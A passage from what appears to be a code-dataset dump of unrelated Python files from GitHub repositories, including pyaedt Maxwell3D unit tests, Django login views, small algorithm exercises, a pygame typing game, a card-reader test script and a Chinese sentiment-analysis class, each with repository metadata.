terminal\"]\n polarity = \"Negative\"\n bound = self.aedtapp.assign_coil(input_object=face_id, polarity=polarity)\n assert bound.props[\"Point out of terminal\"]\n bound_name = generate_unique_name(\"Coil\")\n bound = self.aedtapp.assign_coil(input_object=face_id, name=bound_name)\n assert bound_name == bound.name\n\n def test_05_draw_region(self):\n assert self.aedtapp.modeler.create_air_region(*[300] * 6)\n\n def test_06_eddycurrent(self):\n assert self.aedtapp.eddy_effects_on([\"Plate\"], activate_eddy_effects=True)\n oModule = self.aedtapp.odesign.GetModule(\"BoundarySetup\")\n assert oModule.GetEddyEffect(\"Plate\")\n assert oModule.GetDisplacementCurrent(\"Plate\")\n self.aedtapp.eddy_effects_on([\"Plate\"], activate_eddy_effects=False)\n assert not oModule.GetEddyEffect(\"Plate\")\n assert not oModule.GetDisplacementCurrent(\"Plate\")\n\n def test_07a_setup(self):\n adaptive_frequency = \"200Hz\"\n Setup = self.aedtapp.create_setup()\n Setup.props[\"MaximumPasses\"] = 12\n Setup.props[\"MinimumPasses\"] = 2\n Setup.props[\"MinimumConvergedPasses\"] = 1\n Setup.props[\"PercentRefinement\"] = 30\n Setup.props[\"Frequency\"] = adaptive_frequency\n dc_freq = 0.1\n stop_freq = 10\n count = 1\n assert Setup.add_eddy_current_sweep(\"LinearStep\", dc_freq, stop_freq, count, clear=True)\n assert isinstance(Setup.props[\"SweepRanges\"][\"Subrange\"], dict)\n assert Setup.add_eddy_current_sweep(\"LinearCount\", dc_freq, stop_freq, count, clear=False)\n assert isinstance(Setup.props[\"SweepRanges\"][\"Subrange\"], list)\n\n assert Setup.update()\n assert Setup.enable_expression_cache([\"CoreLoss\"], \"Fields\", \"Phase='0deg' \", True)\n assert Setup.disable()\n assert Setup.enable()\n assert self.aedtapp.setup_ctrlprog(Setup.name)\n\n def test_07b_create_parametrics(self):\n self.aedtapp[\"w1\"] = \"10mm\"\n self.aedtapp[\"w2\"] = \"2mm\"\n setup1 = self.aedtapp.parametrics.add(\"w1\", 0.1, 20, 0.2, \"LinearStep\")\n assert setup1\n expression = \"re(FluxLinkage(\" + self.aedtapp.excitations[2] + \"))\"\n assert setup1.add_calculation(\n calculation=expression,\n ranges={\"Freq\": \"200Hz\"},\n report_type=\"EddyCurrent\",\n solution=self.aedtapp.existing_analysis_sweeps[0],\n )\n\n def test_08_setup_ctrlprog_with_file(self):\n transient_setup = self.aedtapp.create_setup()\n transient_setup.props[\"MaximumPasses\"] = 12\n transient_setup.props[\"MinimumPasses\"] = 2\n transient_setup.props[\"MinimumConvergedPasses\"] = 1\n transient_setup.props[\"PercentRefinement\"] = 30\n transient_setup.props[\"Frequency\"] = \"200Hz\"\n transient_setup.update()\n transient_setup.enable_expression_cache([\"CoreLoss\"], \"Fields\", \"Phase='0deg' \", True)\n\n # Test the creation of the control program file\n with tempfile.TemporaryFile(\"w+\") as fp:\n assert self.aedtapp.setup_ctrlprog(transient_setup.name, file_str=fp.name)\n\n def test_22_create_length_mesh(self):\n assert self.aedtapp.mesh.assign_length_mesh([\"Plate\"])\n\n def test_23_create_skin_depth(self):\n assert self.aedtapp.mesh.assign_skin_depth([\"Plate\"], \"1mm\")\n\n def test_24_create_curvilinear(self):\n assert self.aedtapp.mesh.assign_curvilinear_elements([\"Coil\"], \"1mm\")\n\n def test_24_create_edge_cut(self):\n assert self.aedtapp.mesh.assign_edge_cut([\"Coil\"])\n\n def test_24_density_control(self):\n assert self.aedtapp.mesh.assign_density_control([\"Coil\"], maxelementlength=\"2mm\", layerNum=\"3\")\n\n def test_24_density_control(self):\n assert self.aedtapp.mesh.assign_rotational_layer([\"Coil\"])\n\n def test_25_assign_initial_mesh(self):\n assert self.aedtapp.mesh.assign_initial_mesh_from_slider(4)\n\n def test_26_create_udp(self):\n my_udpPairs = []\n mypair = [\"DiaGap\", \"102mm\"]\n my_udpPairs.append(mypair)\n mypair = [\"Length\", \"100mm\"]\n my_udpPairs.append(mypair)\n mypair = [\"Poles\", \"8\"]\n my_udpPairs.append(mypair)\n mypair = [\"EmbraceTip\", \"0.29999999999999999\"]\n my_udpPairs.append(mypair)\n mypair = [\"EmbraceRoot\", \"1.2\"]\n my_udpPairs.append(mypair)\n mypair = [\"ThickTip\", \"5mm\"]\n my_udpPairs.append(mypair)\n mypair = [\"ThickRoot\", \"10mm\"]\n my_udpPairs.append(mypair)\n mypair = [\"ThickShoe\", \"8mm\"]\n my_udpPairs.append(mypair)\n mypair = [\"DepthSlot\", \"12mm\"]\n my_udpPairs.append(mypair)\n mypair = [\"ThickYoke\", \"10mm\"]\n my_udpPairs.append(mypair)\n mypair = [\"LengthPole\", \"90mm\"]\n my_udpPairs.append(mypair)\n mypair = [\"LengthMag\", \"0mm\"]\n my_udpPairs.append(mypair)\n mypair = [\"SegAngle\", \"5deg\"]\n my_udpPairs.append(mypair)\n mypair = [\"LenRegion\", \"200mm\"]\n my_udpPairs.append(mypair)\n mypair = [\"InfoCore\", \"0\"]\n my_udpPairs.append(mypair)\n\n # Test udp with a custom name.\n my_udpName = \"MyClawPoleCore\"\n udp = self.aedtapp.modeler.create_udp(\n udp_dll_name=\"RMxprt/ClawPoleCore\",\n udp_parameters_list=my_udpPairs,\n upd_library=\"syslib\",\n name=my_udpName,\n udp_type=\"Solid\",\n )\n\n assert udp\n assert udp.name == \"MyClawPoleCore\"\n assert \"MyClawPoleCore\" in udp._primitives.object_names\n assert int(udp.bounding_dimension[2]) == 100\n\n # Modify one of the 'MyClawPoleCore' udp properties.\n assert self.aedtapp.modeler.update_udp(\n object_name=\"MyClawPoleCore\",\n operation_name=\"CreateUserDefinedPart\",\n udp_parameters_list=[[\"Length\", \"110mm\"]],\n )\n\n assert int(udp.bounding_dimension[0]) == 102\n assert int(udp.bounding_dimension[1]) == 102\n assert int(udp.bounding_dimension[2]) == 110\n\n # Test udp with default name -None-.\n second_udp = self.aedtapp.modeler.create_udp(\n udp_dll_name=\"RMxprt/ClawPoleCore\",\n udp_parameters_list=my_udpPairs,\n upd_library=\"syslib\",\n udp_type=\"Solid\",\n )\n\n assert second_udp\n assert second_udp.name == \"ClawPoleCore\"\n assert \"ClawPoleCore\" in udp._primitives.object_names\n\n # Modify two of the 'MyClawPoleCore' udp properties.\n assert self.aedtapp.modeler.update_udp(\n object_name=\"ClawPoleCore\",\n operation_name=\"CreateUserDefinedPart\",\n udp_parameters_list=[[\"Length\", \"110mm\"], [\"DiaGap\", \"125mm\"]],\n )\n\n assert int(second_udp.bounding_dimension[0]) == 125\n assert int(second_udp.bounding_dimension[1]) == 125\n assert int(second_udp.bounding_dimension[2]) == 110\n\n @pytest.mark.skipif(os.name == \"posix\", reason=\"Feature not supported in Linux\")\n def test_27_create_udm(self):\n my_udmPairs = []\n mypair = [\"ILD Thickness (ILD)\", \"0.006mm\"]\n my_udmPairs.append(mypair)\n mypair = [\"Line Spacing (LS)\", \"0.004mm\"]\n my_udmPairs.append(mypair)\n mypair = [\"Line Thickness (LT)\", \"0.005mm\"]\n my_udmPairs.append(mypair)\n mypair = [\"Line Width (LW)\", \"0.004mm\"]\n my_udmPairs.append(mypair)\n mypair = [\"No. of Turns (N)\", 2]\n my_udmPairs.append(mypair)\n mypair = [\"Outer Diameter (OD)\", \"0.15mm\"]\n my_udmPairs.append(mypair)\n mypair = [\"Substrate Thickness\", \"0.2mm\"]\n my_udmPairs.append(mypair)\n mypair = [\n \"Inductor Type\",\n '\"Square,Square,Octagonal,Circular,Square-Differential,Octagonal-Differential,Circular-Differential\"',\n ]\n my_udmPairs.append(mypair)\n mypair = [\"Underpass Thickness (UT)\", \"0.001mm\"]\n my_udmPairs.append(mypair)\n mypair = [\"Via Thickness (VT)\", \"0.001mm\"]\n my_udmPairs.append(mypair)\n\n assert self.aedtapp.modeler.create_udm(\n udmfullname=\"Maxwell3D/OnDieSpiralInductor.py\", udm_params_list=my_udmPairs, udm_library=\"syslib\"\n )\n\n def test_28_assign_torque(self):\n assert self.aedtapp.assign_torque(\"Coil\")\n\n def test_29_assign_force(self):\n assert self.aedtapp.assign_force(\"Coil\")\n\n def test_30_assign_movement(self):\n self.aedtapp.insert_design(\"Motion\")\n self.aedtapp.solution_type = SOLUTIONS.Maxwell3d.Transient\n self.aedtapp.modeler.create_box([0, 0, 0], [10, 10, 10], name=\"Inner_Box\")\n self.aedtapp.modeler.create_box([0, 0, 0], [30, 20, 20], name=\"Outer_Box\")\n bound = self.aedtapp.assign_translate_motion(\"Outer_Box\", mechanical_transient=True, velocity=1)\n assert bound\n assert bound.props[\"Velocity\"] == \"1m_per_sec\"\n\n def test_31_core_losses(self):\n\n m3d1 = Maxwell3d(self.file_path, specified_version=desktop_version)\n assert m3d1.set_core_losses([\"PQ_Core_Bottom\", \"PQ_Core_Top\"])\n assert m3d1.set_core_losses([\"PQ_Core_Bottom\"], False)\n self.aedtapp.close_project(m3d1.project_name, False)\n\n def test_32_matrix(self):\n m3d = Maxwell3d(self.file_path, specified_version=desktop_version)\n m3d.solution_type = SOLUTIONS.Maxwell3d.ElectroStatic\n m3d.modeler.primitives.create_box([0, 1.5, 0], [1, 2.5, 5], name=\"Coil_1\", matname=\"aluminum\")\n m3d.modeler.primitives.create_box([8.5, 1.5, 0], [1, 2.5, 5], name=\"Coil_2\", matname=\"aluminum\")\n m3d.modeler.primitives.create_box([16, 1.5, 0], [1, 2.5, 5], name=\"Coil_3\", matname=\"aluminum\")\n m3d.modeler.primitives.create_box([32, 1.5, 0], [1, 2.5, 5], name=\"Coil_4\", matname=\"aluminum\")\n\n rectangle1 = m3d.modeler.primitives.create_rectangle(0, [0.5, 1.5, 0], [2.5, 5], name=\"Sheet1\")\n rectangle2 = m3d.modeler.primitives.create_rectangle(0, [9, 1.5, 0], [2.5, 5], name=\"Sheet2\")\n rectangle3 = m3d.modeler.primitives.create_rectangle(0, [16.5, 1.5, 0], [2.5, 5], name=\"Sheet3\")\n rectangle4 = m3d.modeler.primitives.create_rectangle(0, [32.5, 1.5, 0], [2.5, 5], name=\"Sheet4\")\n\n m3d.assign_voltage(rectangle1.faces[0], amplitude=1, name=\"Voltage1\")\n m3d.assign_voltage(rectangle2.faces[0], amplitude=1, name=\"Voltage2\")\n m3d.assign_voltage(rectangle3.faces[0], amplitude=1, name=\"Voltage3\")\n m3d.assign_voltage(rectangle4.faces[0], amplitude=1, name=\"Voltage4\")\n\n L = m3d.assign_matrix(sources=\"Voltage1\")\n assert L.props[\"MatrixEntry\"][\"MatrixEntry\"][0][\"Source\"] == \"Voltage1\"\n assert L.delete()\n group_sources = \"Voltage2\"\n L = m3d.assign_matrix(sources=[\"Voltage1\", \"Voltage3\"], matrix_name=\"Test1\", group_sources=group_sources)\n assert L.props[\"MatrixEntry\"][\"MatrixEntry\"][1][\"Source\"] == \"Voltage3\"\n m3d.solution_type = SOLUTIONS.Maxwell3d.Transient\n winding1 = m3d.assign_winding(\"Sheet1\", name=\"Current1\")\n winding2 = m3d.assign_winding(\"Sheet2\", name=\"Current2\")\n winding3 = m3d.assign_winding(\"Sheet3\", name=\"Current3\")\n winding4 = m3d.assign_winding(\"Sheet4\", name=\"Current4\")\n L = m3d.assign_matrix(sources=\"Current1\")\n assert not L\n self.aedtapp.close_project(m3d.project_name, False)\n\n def test_33_mesh_settings(self):\n assert self.aedtapp.mesh.initial_mesh_settings\n assert self.aedtapp.mesh.initial_mesh_settings.props\n\n def test_34_assign_voltage_drop(self):\n circle = self.aedtapp.modeler.create_circle(position=[10, 10, 0], radius=5, cs_plane=\"XY\")\n self.aedtapp.solution_type = \"Magnetostatic\"\n assert self.aedtapp.assign_voltage_drop([circle.faces[0]])\n","repo_name":"pvinodk143/working_phase1","sub_path":"_unittest/test_28_Maxwell3D.py","file_name":"test_28_Maxwell3D.py","file_ext":"py","file_size_in_byte":16078,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"9953218645","text":"import numpy as np\nimport re\ninfile = open('../data/5-gram-yao.txt',\"r\", encoding=\"utf-8\")\noutfile = open('../input_data/yao.txt',\"w\", encoding=\"utf-8\")\nf = infile.readlines()\n\nfor line in f :\n line = line.replace(\"f_node_name\",\"'f_node_name'\").replace(\"f_node_label\", \"'f_node_label'\")\\\n .replace(\"relation_name\", \"'relation_name'\").replace(\"l_node_name\", \"'l_node_name'\")\\\n .replace('\"', \"'\").replace(\"/[1-9][0-9]*/\",\"\").replace(\": Tuples \", \"\")\n # rule = \"\\d\"\n new_line = re.sub('[\\d]', '', line)\n\n # line = line.split(\"{\", 1)\n # # del(line[0])\n\n print(new_line)\n outfile.write(str(new_line))","repo_name":"LinJingOK/dataFromJson","sub_path":"Neo4j/code/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"70359893539","text":"from django.http import HttpResponse,HttpResponseRedirect\nfrom django.template import loader\nfrom django.contrib.auth import authenticate, login, logout\n\ndef login_view(request):\n template = loader.get_template('base.html')\n context={'app_name':'login'}\n if request.user.is_authenticated():\n return HttpResponseRedirect('/app/')\n elif request.method == 'POST':\n user=authenticate(username=request.POST['uname'],password=request.POST['passwd'])\n if user is not None:\n login(request,user)\n return HttpResponseRedirect('/app/')\n else:\n context['args']='{failedLogin:true,}'\n return HttpResponse(template.render(context, request))\n else:\n context['args']='{failedLogin:false,}'\n return HttpResponse(template.render(context, request))\n\ndef logout_view(request):\n logout(request)\n return HttpResponseRedirect('/login/')\n","repo_name":"emorthen/interlecture","sub_path":"interlecture/login/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"22154383449","text":"from typing import List\n\n\ndef search_and_mark(row, col, grid):\n\n queue = [(row, col)]\n directions = [\n (0, 1), (1, 0), (0, -1), (-1, 0)\n ]\n while queue:\n r, c = queue.pop()\n if grid[r][c] == \"X\":\n grid[r][c] = \".\"\n for dir in directions:\n new_r, new_c = r + dir[0], c + dir[1]\n if new_r < 0 or new_r >= len(grid):\n continue\n if new_c < 0 or new_c >= len(grid[0]):\n continue\n if grid[new_r][new_c] == \"X\":\n queue.append((new_r, new_c))\n\n\nclass Solution:\n def countBattleships(self, board: List[List[str]]) -> int:\n count = 0\n for row in range(len(board)):\n for col in range(len(board[0])):\n if board[row][col] == \"X\":\n count += 1\n search_and_mark(row, col, board)\n return count\n","repo_name":"EdmundMartin/LeetcodeProjectAmerica","sub_path":"medium/419_battleships_in_a_board.py","file_name":"419_battleships_in_a_board.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"73412194978","text":"# 문제의 수도 코드를 이용하여 푼 버전\nn = int(input())\n\ndef rec(n):\n fib = [0] * (n + 1)\n fib[1] = 1\n fib[2] = 1\n for i in range(3, n + 1):\n fib[i] = fib[i - 2] + fib[i - 1]\n return fib[n]\n\ndef dp(n):\n fib = [0] * (n + 1)\n fib[1] = 1\n fib[2] = 1\n count = 0\n for i in range(3, n + 1):\n count += 1\n fib[i] = fib[i - 2] + fib[i - 1]\n return count\n\nprint(rec(n), dp(n))\n\n# 짧은 버전\nn = int(input())\ndp = [0, 1, 1]\nfor i in range(3, n + 1):\n dp.append(dp[i - 2] + dp[i - 1])\nprint(dp[n], n - 2)\n","repo_name":"vichye-1/Algorithm","sub_path":"Python/BOJ/20000/24416_알고리즘 수업 - 피보나치 수 1.py","file_name":"24416_알고리즘 수업 - 피보나치 수 1.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"33960271504","text":"import sys\nfrom tmdb_dal import update_movie_runtime\nfrom errors import invalid_movieID_argument, invalid_runtime_argument, invalid_runtime_syntax\nif len(sys.argv) != 3:\n raise Exception(invalid_runtime_syntax)\n exit(1)\n\ntry:\n movieId = sys.argv[1]\n runtime = int(sys.argv[2])\nexcept ValueError:\n raise Exception(invalid_runtime_argument)\n\nresult = update_movie_runtime(int(movieId), int(runtime))\nif not result:\n raise Exception(invalid_movieID_argument)\nprint(\n f\"Movie with ID {movieId} has been updated to a runtime of {runtime}\")\n","repo_name":"cpon00/full-db-sdk-cinquel","sub_path":"python/update_movie_runtime.py","file_name":"update_movie_runtime.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"40238301189","text":"import pygame\nfrom pygame.locals import *\n\nclass User:\n def __init__(self, font):\n self.font = font\n self.fontWidth = self.font.size('M')[0]\n self.fontHeight = self.font.size('Tg')[1]\n self.text = self.difficulty = ''\n \n def display(self, screen, rect, color, aa = True):\n pygame.draw.rect(screen, color, rect, 2)\n\n \n text = self.text\n\n if self.difficulty == 'word-by-word':\n if ' ' in text[:-1]:\n text = text[text.rindex(' '):].strip()\n else:\n text = text.strip()\n\n rect = pygame.Rect(rect)\n\n while self.font.size(text)[0] > rect.width:\n i = 1\n while self.font.size(text[:i])[0] < rect.width and i < len(text):\n i += 1\n text = text[i:]\n\n image = self.font.render(text, aa, color)\n screen.blit(image, (rect.left + 10, rect.y))\n\n def input(self, event):\n ctrl, backspace = pygame.key.get_pressed()[K_LCTRL], pygame.key.get_pressed()[K_BACKSPACE]\n space = pygame.key.get_pressed()[K_SPACE]\n\n if ctrl and backspace:\n try:\n self.text = self.text[:self.text.rindex(\" \")]\n except ValueError:\n self.text = ''\n\n elif backspace:\n if self.difficulty == 'word-by-word':\n if self.text[-1] != ' ':\n self.text = self.text[:-1]\n else:\n self.text = self.text[:-1]\n\n else:\n self.text += event.unicode\n \n def empty(self):\n self.text = ''\n \n def length(self):\n return len(self.text)\n \n def _show(self, text):\n self.text = text\n \n def set_difficulty(self, difficulty):\n self.difficulty = difficulty\n \n def cur_word(self):\n try:\n return self.text.count(' ')\n except:\n return 0","repo_name":"JoshuaHM-p4/speed-type-pygame","sub_path":"gamelib/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"2309858066","text":"#17413 단어 뒤집기 2\n#문자열, 정규표현식\n\nimport re\n\nr = re.compile('<[a-z ]+>|[a-z0-9 ]+')\nregs = r.findall(input())\n\n\nans = ''\nfor x in regs:\n if x[0] == '<':\n ans += x\n else:\n temp = x.split(' ')\n rev = []\n for y in temp:\n y = y[::-1]\n rev.append(y)\n rev = \" \".join(rev)\n ans += rev\n\nprint(ans)","repo_name":"llordly/ploblem-solving","sub_path":"17413.py","file_name":"17413.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"72823252200","text":"import argparse\nimport signal\nimport time\n\nfrom devices.vendors.teracom.act230.act230 import ACT230\nfrom devices.factories.card_readers.card_reader_state import CardReaderState\n\n#region File Attributes\n\n__author__ = \"Orlin Dimitrov\"\n\"\"\"Author of the file.\"\"\"\n\n__copyright__ = \"Copyright 2020, POLYGON Team Ltd.\"\n\"\"\"Copyrighter\n@see http://polygonteam.com/\"\"\"\n\n__credits__ = [\"Angel Boyarov\"]\n\"\"\"Credits\"\"\"\n\n__license__ = \"GPLv3\"\n\"\"\"License\n@see http://www.gnu.org/licenses/\"\"\"\n\n__version__ = \"1.0.0\"\n\"\"\"Version of the file.\"\"\"\n\n__maintainer__ = \"Orlin Dimitrov\"\n\"\"\"Name of the maintainer.\"\"\"\n\n__email__ = \"or.dimitrov@polygonteam.com\"\n\"\"\"E-mail of the author.\n@see or.dimitrov@polygonteam.com\"\"\"\n\n__status__ = \"Debug\"\n\"\"\"File status.\"\"\"\n\n#endregion\n\n__reader = None\n__time_to_stop = False\n\ndef reader_read(card_id, reader_id):\n\n print(\"Card ID: {}; Reader ID: {}\".format(card_id, reader_id))\n\ndef shutdown():\n global __reader, __time_to_stop\n\n __time_to_stop = True\n\n print(\"Stopping\")\n\n if __reader is not None:\n __reader.shutdown()\n\n while __reader.reader_state == CardReaderState.RUN:\n pass\n\n del __reader\n\n print(\"Stopped\")\n\ndef init(port_name, sn):\n global __reader, __time_to_stop\n\n __time_to_stop = False\n\n print(\"Starting\")\n\n # Create card reader.\n __reader = ACT230(port_name=port_name,\n baudrate=9600,\n serial_number=sn)\n\n if __reader.reader_state is CardReaderState.NONE:\n __reader.cb_read_card(reader_read)\n __reader.init()\n\n print(\"Started\")\n\ndef update():\n global __reader, __time_to_stop\n\n # Check the exit card reader.\n if __reader is not None:\n\n # Update card reader.\n __reader.update()\n\n if __reader.reader_state == CardReaderState.STOP:\n\n message = \"Card reader {}; State {}; Port {}.\"\\\n .format(__reader.serial_number, \\\n __reader.reader_state, \\\n __reader.port_name)\n\n print(message)\n\n __reader.init()\n\n if __reader.reader_state == CardReaderState.NONE:\n\n message = \"Card reader {}; State {}.\"\\\n .format(__reader.serial_number, __reader.reader_state)\n\n print(message)\n\n __reader.init()\n\ndef interupt_handler(signum, frame):\n \"\"\"Interupt handler.\"\"\"\n\n global __time_to_stop\n\n __time_to_stop = True\n\n if signum == 2:\n print(\"Stopped by interupt.\")\n\n elif signum == 15:\n print(\"Stopped by termination.\")\n\n else:\n print(\"Signal handler called. Signal: {}; Frame: {}\".format(signum, frame))\n\n shutdown()\n\ndef main():\n global __time_to_stop\n\n\n # Add signal handler.\n signal.signal(signal.SIGINT, interupt_handler)\n signal.signal(signal.SIGTERM, interupt_handler)\n\n # Create parser.\n parser = argparse.ArgumentParser()\n\n # Add arguments.\n parser.add_argument(\"--port\", type=str, default=\"COM5\", help=\"Serial port\")\n parser.add_argument(\"--sn\", type=str, default=\"2911\", help=\"Host of the robot.\")\n\n # Take arguments.\n args = parser.parse_args()\n\n init(args.port, args.sn)\n\n while not __time_to_stop:\n update()\n time.sleep(1)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"bgerp/ztm","sub_path":"Zontromat/devices/vendors/teracom/act230/tests/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"41296858826","text":"import os\nimport pickle \nimport json\nfrom tqdm import tqdm\n\ndef cvt_pkl2xz(predict_relations,save_dir):\n \n if not os.path.exists(save_dir):\n os.makedirs(save_dir)\n \n results = predict_relations\n\n count = 0\n for video_name, res in tqdm(results.items()):\n # print(video_name)\n # print(res[0].keys())\n\n res_ = []\n for r in res:\n sub_traj = r[\"sub_traj\"]\n # sub_traj = [[round(int(x)) for x in xx] for xx in sub_traj]\n\n obj_traj = r[\"obj_traj\"]\n # obj_traj = [[round(int(x)) for x in xx] for xx in obj_traj]\n\n res_.append(\n {\n \"triplet\":r[\"triplet\"],\n \"duration\":r[\"duration\"],\n \"score\":r[\"score\"],\n \"sub_traj\":sub_traj,\n \"obj_traj\":obj_traj\n }\n )\n\n result_per_video = {video_name:res_}\n save_path = os.path.join(save_dir,video_name)\n with open(save_path,'w') as f:\n json.dump(result_per_video,f)\n\n os.system(\"xz -z {}\".format(save_path)) # xz compression\n count += 1\n # if count > 4:\n # break\n\n\n\n\n ## --------- zip compression -------\n print(\"finish cvt-result, start zip compression...\")\n os.system(\"zip -r {}.zip {}\".format(save_dir,save_dir))\n\n abs_path = os.path.abspath(\"{}.zip\".format(save_dir))\n print(\"all finished, result saved at {}\".format(abs_path))\n os.system(\"du -sh {}\".format(abs_path))\n","repo_name":"Dawn-LX/VidSGG-BIG","sub_path":"utils/cvt_result.py","file_name":"cvt_result.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"18"} +{"seq_id":"1813926620","text":"# -*- coding: utf-8 -*-\n\nimport codecs\nimport re\n\nimport sys\n\nfrom lxml import etree\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfrom setting import *\n\n\nsys.path.append('E:\\Python\\workspace\\TDTSystem')\nfrom ltp.ltp import Ltp\n\n\n# 文本情感分析类\nclass EmotionAnalysis:\n\n def __init__(self, ltp):\n \"\"\"\n init class\n :param ltp: Ltp类实例\n \"\"\"\n self.ltp = ltp\n self.postive_list = []\n self.negative_list = []\n self.deny_list = []\n self.degree_list = []\n\n if POSTIVE_DICT_PATH: # 载入正向情感词典\n self.postive_list = self.open_dict(POSTIVE_DICT_PATH)\n if NEGATIVE_DICT_PATH: # 载入负向情感词典\n self.negative_list = self.open_dict(NEGATIVE_DICT_PATH)\n if DENY_DICT_PATH: # 载入否定词典\n self.deny_list = self.open_dict(DENY_DICT_PATH)\n if DEGREE_DICT_PATH: # 载入程度副词词典\n self.degree_list = self.open_dict(DEGREE_DICT_PATH)\n\n def open_dict(self, file_path):\n \"\"\"\n 载入词典\n :param file_path: str, 词典路径\n :return: list, 词列表\n \"\"\"\n dict = []\n with open(file_path, encoding='utf-8') as f:\n for line in f.readlines():\n line = line.strip()\n if line:\n dict.append(line)\n return dict\n\n def judgeodd(self, num):\n \"\"\"\n 判断整数奇偶性\n :param num: int\n :return:\n \"\"\"\n if (num % 2) == 0:\n return False\n else:\n return True\n\n def get_degree_score(self, word):\n \"\"\"\n 获取程度副词的权重\n :param word: str\n :return: float\n \"\"\"\n try:\n index = self.degree_list.index(word)\n print('d:', word)\n for i in range(len(DEGREE_SCORE[0])):\n if index < DEGREE_SCORE[0][i]:\n return DEGREE_SCORE[1][i]\n return DEGREE_SCORE[1][i + 1]\n except:\n return 1.0\n\n def contain_word(self, sentence, word):\n \"\"\"\n 判断句子是否包含某单词\n :param sentence: list,\n :param word: str\n :return:\n \"\"\"\n for words in sentence:\n if word in words:\n return True\n return False\n\n def word_arcs_analyse(self, i, arcs, roles=None):\n \"\"\"\n 根据情感词语在句子中的依存句法关系,修正情感分值\n :param i: int, 情感词在句子中的索引\n :param arcs: Ltp依存句法关系分析输出\n :param roles: Ltp语义角色标注输出\n :return: float\n \"\"\"\n if roles:\n for role in roles:\n if i == role.index:\n return 3.0\n label = arcs[i][1]\n if re.search('COO', label):\n label = arcs[arcs[i][0] - 1][1]\n print(label)\n if re.search('SBV|POB', label):\n return 0.0\n elif re.search('ATT|ADV', label):\n return 0.5\n elif re.search('VOB', label):\n return 2.0\n elif re.search('HED', label):\n return 3.0\n else:\n return 1.0\n\n def sentiment_score(self, parser):\n \"\"\"\n 句子情感分析算法\n :param parser: list, Ltp.sentence_parser输出\n :return: list, [正面情感分值, 负面情感分值]\n \"\"\"\n words = parser[0] # 分词结果\n arcs = parser[3] # 依存句法分析结果\n roles = parser[4] # 语义角色标注结果\n i = 0\n a = 0\n postive_score = 0.0\n negative_score = 0.0\n for i in range(len(words)):\n word = words[i].strip()\n if not word:\n continue\n temp_score = 0.0\n if word in self.postive_list: # 扫描正面情感词\n print('+', word)\n temp_score = self.word_arcs_analyse(i, arcs, roles)\n c = 0\n for w in words[a:i]: # 扫描程度副词\n temp_score *= self.get_degree_score(w)\n if w in self.deny_list: # 扫描否定词\n print('n: ', w)\n c += 1\n if self.judgeodd(c):\n postive_score += (temp_score * -1.0)\n else:\n postive_score += temp_score\n a = i + 1\n\n elif word in self.negative_list: # 扫面负面情感词\n print('-', word)\n temp_score = self.word_arcs_analyse(i, arcs, roles)\n c = 0\n for w in words[a:i]:\n temp_score *= self.get_degree_score(w)\n if w in self.deny_list:\n print('n: ', w)\n c += 1\n if self.judgeodd(c):\n negative_score += (temp_score * -1.0)\n else:\n negative_score += temp_score\n a = i + 1\n\n # elif word == '!' or word == '!':\n # print(words)\n # for w2 in words[::-1]:\n # if w2 in self.postive_list or self.negative_list:\n # postive_score *= 2.0\n # negative_score *= 2.0\n # break\n # i += 1 # 扫描词位置前移\n\n if postive_score < 0:\n negative_score -= postive_score\n postive_score = 0\n if negative_score < 0:\n postive_score -= negative_score\n negative_score = 0\n\n return [postive_score, negative_score]\n\n def sent_sentiment_score(self, text):\n \"\"\"\n 文档情感分析,文档分句,每句进行情感分析,后加权平均\n :param text:\n :return:\n \"\"\"\n sents = [sentence for sentence in re.split(r'[,,]', text) if sentence]\n score = [0.0, 0.0]\n for sent in sents:\n parser = self.ltp.sentence_parser(sent)\n score_temp = self.sentiment_score(parser)\n # print(score_temp)\n score[0] += score_temp[0]\n score[1] += score_temp[1]\n # for review in senti_score_list:\n # score_array = np.array(review)\n # Pos = np.sum(score_array[:, 0])\n # Neg = np.sum(score_array[:, 1])\n # AvgPos = np.mean(score_array[:, 0])\n # AvgPos = float('%.1f'%AvgPos)\n # AvgNeg = np.mean(score_array[:, 1])\n # AvgNeg = float('%.1f'%AvgNeg)\n # StdPos = np.std(score_array[:, 0])\n # StdPos = float('%.1f'%StdPos)\n # StdNeg = np.std(score_array[:, 1])\n # StdNeg = float('%.1f'%StdNeg)\n # score.append([Pos, Neg, AvgPos, AvgNeg, StdPos, StdNeg])\n return score\n\n\ndef xml_analysis(xml_path):\n tree = etree.parse(xml_path)\n root = tree.getroot()\n fr1 = codecs.open('train_data.txt', 'a', 'utf-8')\n fr2 = codecs.open('train_label.txt', 'a', 'utf-8')\n for child in root:\n for sentence in child.xpath('.//sentence'):\n text = str(sentence.xpath('.//text()')[0]).strip()\n label = sentence.attrib.get('polarity')\n if label:\n if label == 'POS':\n label = '1'\n elif label == 'NEG':\n label = '-1'\n else:\n label = '0'\n\n if text:\n fr1.write(text + '\\n')\n fr2.write(label + '\\n')\n text = None\n label = None\n fr1.close()\n fr2.close()\n\n\nif __name__ == '__main__':\n ltp = Ltp(4)\n ltp.load_dict(ALL_DICT_PATH)\n analyzer = 